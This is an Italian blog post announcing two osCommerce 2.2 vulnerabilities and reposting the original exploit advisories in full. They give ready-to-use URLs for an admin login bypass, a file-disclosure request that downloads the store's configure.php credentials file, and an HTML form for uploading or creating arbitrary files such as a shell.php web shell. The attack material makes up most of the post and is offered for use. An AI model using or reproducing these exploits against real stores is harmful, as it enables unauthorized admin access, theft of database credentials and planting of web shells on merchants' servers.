Due sono gli exploit scoperti a poche ore dell’ultima versione di OScommerce, probabilmente il più noto CMS dedicato al mondo dell’ecomerce e completamente Opern Surce!

Entrambi gli exploit affliggono l’ultima relase 2.2 e permetterebbero l’accesso a file della board con la possibilità di scrittura e la possibilità di visualizzare il pannello di Admin senza credenziali.

Dopo il salto, come di consueto, troverete gli exploi…

Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : [email protected]
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this Trick if admin folder not protected by .htaccess

if you Want to explore admin page without login. You can use /login.php behind the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can See all file in Directory Oscommerce.. haha

and you can download all file with tRick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Oscommerce Online Merchant v2.2 – Remote File Upload

______                _       _   _
 | ___ \              | |     | | (_)
 | |_/ /_____   _____ | |_   _| |_ _  ___  _ __
 |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
 | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |
 \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|

 _____                      _____  _____
 |_   _|                    |  _  ||  _  |
 | | ___  __ _ _ __ ___   | |/' || |_| |
 | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
 | |  __/ (_| | | | | | | \ |_/ /.___/ /
 \_/\___|\__,_|_| |_| |_|  \___/ \____/

 DEFACEMENT it's for script kiddies...
_____________________________________________________________

[$] Exploit Title     : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date              : 30-05-2010
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Remote File Upload
[$] Vendor            : http://www.oscommerce.com
[$] Google Dork       : n/a

[%] vulnerable file: /admin/file_manager.php

[REMOTE FILE UPLOAD VULNERABILITY]

[$] Exploit:

<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>

<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value="   Save   " >
</form>
</html>

[=] Thanks to  Flyff666 for the original exploit:
 - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass

[§] Greetings from PORTUGAL ^^

Did you like this?
Tip Andrea Draghetti with Cryptocurrency

Donate Bitcoin to Andrea Draghetti

Scan to Donate Bitcoin to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some bitcoin:

Donate Bitcoin Cash to Andrea Draghetti

Scan to Donate Bitcoin Cash to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send bitcoin:

Donate Ethereum to Andrea Draghetti

Scan to Donate Ethereum to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some Ether:

Donate Litecoin to Andrea Draghetti

Scan to Donate Litecoin to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some Litecoin:

Donate Monero to Andrea Draghetti

Scan to Donate Monero to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some Monero:

Donate ZCash to Andrea Draghetti

Scan to Donate ZCash to Andrea Draghetti
Scan the QR code or copy the address below into your wallet to send some ZCash: